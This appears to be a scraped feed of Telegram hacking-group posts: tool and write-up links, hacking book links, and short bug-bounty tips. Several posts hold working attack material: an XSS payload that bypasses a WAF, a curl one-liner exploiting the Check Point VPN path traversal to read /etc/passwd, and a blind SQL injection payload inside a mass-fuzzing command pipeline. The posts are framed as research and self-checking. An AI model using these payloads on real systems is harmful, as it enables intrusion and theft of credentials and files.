Termux All Command [Telegram Group]

[+] Sensitive Secrets Exposed! I recently discovered a sensitive file /\.env containing: SECRET_KEY AWS_ACCESS_KEY_ID AWS_SECRET_ACCESS_KEY AWS_STORAGE_BUCKET_NAME auth_token account_sid

Automate DNS Enumerations With DNS G. : https://github.com/sakibulalikhan/dnsg

Excited to share my latest video with you all! 🎥 Dive into the most cutting-edge methods to hunt down XSS vulnerabilities in 2024 and learn how to outsmart common web application firewall misconfigurations. 🛡✨ Unlock the secrets to becoming a web security ninja! 🔐 👉 Check it out now: https://lnkd.in/dZSq_6ks

Hello security researchers and bounty hunters! 👋 Today, I discovered a reflected XSS vulnerability on a bug bounty site protected by a Web Application Firewall (WAF). Endpoint : https://lnkd.in/dnQ8h5Rr Here's a quick rundown of my findings: The parameter value was reflected in the source code within a <​script> tag as parameter="myvalue";. Initial payload attempts like "-alert()-", "-confirm()-", and "-prompt()-" were blocked by the WAF. After further testing, I found that the WAF only blocked those specific keywords (alert(), confirm(), prompt() ). I successfully bypassed the WAF using the payload "-(alert)(1337)-". Endpoint : Endpoint : https://lnkd.in/dnQ8h5Rr"-(alert)(1337)-"

Dorks List : https://github.com/HackShiv/OneDorkForAll/tree/main

Hacker Books: Penetration Testing: A Hands-On Introduction to Hacking: https://amzn.to/31GN7iX The Hacker Playbook 3: https://amzn.to/34XkIY2 Hacking: The Art of Exploitation: https://amzn.to/2VchDyL The Web Application Hacker's Handbook: https://amzn.to/30Fj21S Real-World Bug Hunting: A Field Guide to Web Hacking: https://amzn.to/2V9srOe Social Engineering: The Science of Human Hacking: https://amzn.to/31HAmVx Linux Basics for Hackers: https://amzn.to/34WvcXP Python Crash Course, 2nd Edition: https://amzn.to/30gINu0 Violent Python: https://amzn.to/2QoGoJn Black Hat Python: https://amzn.to/2V9GpQk

Auxiliary script meant for Red Team exercises to check if an URL redirects to a masked 404 (such as 200 that redirects to a "Not found" page or similars). URLs must be passed sorted in order to improve performance. : https://github.com/carlospolop/404checker

As an OSINT investigator 🔍 I often need to expand Instagram profile photos for effective analysis. Did you know that the Forensic OSINT Chrome extension has a data insights button that lets you quickly view profile photos in a larger format? This feature, along with other helpful research tips 🛠 streamline your investigation process.

Hello Guys I got a awesome tool 🔥💯 For OSINT , Information Gathering to track ip,s and mobile number, username✌️ https://lnkd.in/dyBFdX92

I guess you've already read about the recent Check Point VPN path-traversal zero-day. In my opinion, this is more worrying than some news/advisories are saying, because: - It's extremely easy to exploit (remote & unauthenticated), and we know that VPN servers are Internet exposed. - The PoC is already public, widespread, and really easy to find. - If you're not familiar with path-traversal vulnerabilities, it allows an attacker to read any file on the server. For example, the shadow file containing user accounts hashed passwords. - Shodan shows more than 20k Check Point VPN servers exposed to the Internet. Here's a quick one-liner I just made that you can use to confirm if your server is vulnerable: curl -k -s https://HOST/clients/MyCRL -X POST -d "aCSHELL/../../../../../../../etc/passwd" | grep -q 'root:' && echo "Vulnerable" || echo "Not Vulnerable" Check Point security advisory - CVE-2024-24919: https://lnkd.in/ekZKGubZ Patch and rotate your passwords ASAP!

Bug: Blind SQLi Payload: (SELECT(0)FROM(SELECT(SLEEP(10)))a) Command: waymore -i "target.com" -n -mode U | qsreplace "FUZZ" | gf sqli | sort -u | while read urls; do ffuf -u "$urls" -w /usr/share/wordlists/my-payloads/SQLi/Blind-SQLis/blind-sqli.txt -mt ">18000" -v -mc 200 -enc FUZZ:urlencode -timeout 150 -o SQLi_blind_ffuf.json; done

Bug: Cross Site Scripting Tip: entrypoint=1/wp-content/themes/ambience/thumb.php?src= ✘ entrypoint=1/wp-content/themes/ambience/thumb.php?src=.png ✔️

Another THM : https://github.com/vrbait1107/CTF_WRITEUPS/

another thm : https://github.com/NovusEdge/thm-writeups